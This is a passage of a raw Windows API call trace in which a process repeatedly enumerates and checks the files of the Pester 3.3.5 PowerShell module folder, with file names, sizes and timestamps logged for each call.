ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5f862d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4b06, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.Tests.ps1", cAlternateFileName="")) returned 1 [0265.414] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1124, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.md", cAlternateFileName="")) returned 1 [0265.414] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x329315c, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x329315c, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Snippets", cAlternateFileName="")) returned 1 [0265.414] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0265.414] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0265.414] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e2d0) returned 1 [0265.414] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e290) returned 1 [0265.414] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e380) returned 1 [0265.414] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0x1b81de70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37 [0265.414] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\", nBufferLength=0x105, lpBuffer=0x1b81de10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\", lpFilePart=0x0) returned 0x38 [0265.414] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\*", lpFindFileData=0x1b81e020 | out: lpFindFileData=0x1b81e020*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0265.415] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.415] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bin", cAlternateFileName="")) returned 1 [0265.415] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="build.psake.ps1", cAlternateFileName="")) returned 1 [0265.415] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2756, dwReserved0=0x0, dwReserved1=0x0, cFileName="CHANGELOG.md", cAlternateFileName="")) returned 1 [0265.415] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0265.416] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Examples", cAlternateFileName="")) returned 1 [0265.416] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3246caf, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3246caf, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Functions", cAlternateFileName="FUNCTI~1")) returned 1 [0265.416] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x263, dwReserved0=0x0, dwReserved1=0x0, cFileName="LICENSE", cAlternateFileName="")) returned 1 [0265.416] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="nunit_schema_2.5.xsd", cAlternateFileName="")) returned 1 [0265.416] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x731, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.nuspec", cAlternateFileName="")) returned 1 [0265.416] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psd1", cAlternateFileName="")) returned 1 [0265.416] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x62de, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psm1", cAlternateFileName="")) returned 1 [0265.417] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5f862d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4b06, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.Tests.ps1", cAlternateFileName="")) returned 1 [0265.417] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1124, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.md", cAlternateFileName="")) returned 1 [0265.417] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x329315c, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x329315c, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Snippets", cAlternateFileName="")) returned 1 [0265.417] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x329315c, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x329315c, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Snippets", cAlternateFileName="")) returned 0 [0265.417] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0265.417] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e2d0) returned 1 [0265.417] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e290) returned 1 [0265.417] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0x1b81df10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37 [0265.418] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0x1b81df70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37 [0265.418] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e3b0) returned 1 [0265.418] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5"), fInfoLevelId=0x0, lpFileInformation=0x1b81e490 | out: lpFileInformation=0x1b81e490*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0265.418] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e370) returned 1 [0265.418] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e3e0) returned 1 [0265.418] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0x1b81ded0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37 [0265.418] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\", nBufferLength=0x105, lpBuffer=0x1b81de70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\", lpFilePart=0x0) returned 0x38 [0265.418] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\*", lpFindFileData=0x1b81e080 | out: lpFindFileData=0x1b81e080*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0265.418] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e0d0 | out: lpFindFileData=0x1b81e0d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.418] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e0d0 | out: lpFindFileData=0x1b81e0d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bin", cAlternateFileName="")) returned 1 [0265.419] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e0d0 | out: lpFindFileData=0x1b81e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="build.psake.ps1", cAlternateFileName="")) returned 1 [0265.419] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e0d0 | out: lpFindFileData=0x1b81e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2756, dwReserved0=0x0, dwReserved1=0x0, cFileName="CHANGELOG.md", cAlternateFileName="")) returned 1 [0265.419] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e0d0 | out: lpFindFileData=0x1b81e0d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0265.419] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e0d0 | out: lpFindFileData=0x1b81e0d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Examples", cAlternateFileName="")) returned 1 [0265.419] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e0d0 | out: lpFindFileData=0x1b81e0d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3246caf, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3246caf, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Functions", cAlternateFileName="FUNCTI~1")) returned 1 [0265.425] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e0d0 | out: lpFindFileData=0x1b81e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x263, dwReserved0=0x0, dwReserved1=0x0, cFileName="LICENSE", cAlternateFileName="")) returned 1 [0265.425] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e0d0 | out: lpFindFileData=0x1b81e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="nunit_schema_2.5.xsd", cAlternateFileName="")) returned 1 [0265.425] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e0d0 | out: lpFindFileData=0x1b81e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x731, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.nuspec", cAlternateFileName="")) returned 1 [0265.426] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e0d0 | out: lpFindFileData=0x1b81e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psd1", cAlternateFileName="")) returned 1 [0265.426] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e0d0 | out: lpFindFileData=0x1b81e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x62de, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psm1", cAlternateFileName="")) returned 1 [0265.426] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e0d0 | out: lpFindFileData=0x1b81e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5f862d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4b06, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.Tests.ps1", cAlternateFileName="")) returned 1 [0265.426] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e0d0 | out: lpFindFileData=0x1b81e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1124, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.md", cAlternateFileName="")) returned 1 [0265.426] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e0d0 | out: lpFindFileData=0x1b81e0d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x329315c, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x329315c, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Snippets", cAlternateFileName="")) returned 1 [0265.426] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e0d0 | out: lpFindFileData=0x1b81e0d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0265.427] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0265.427] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e330) returned 1 [0265.427] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e2f0) returned 1 [0265.427] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.psd1")) returned 0xffffffff [0265.427] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.psm1")) returned 0xffffffff [0265.427] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.cdxml")) returned 0xffffffff [0265.427] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.xaml")) returned 0xffffffff [0265.427] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.dll")) returned 0xffffffff [0265.428] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0x1b81e100, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0265.428] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e540) returned 1 [0265.428] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester" (normalized: "c:\\program files\\windowspowershell\\modules\\pester"), fInfoLevelId=0x0, lpFileInformation=0x1b81e620 | out: 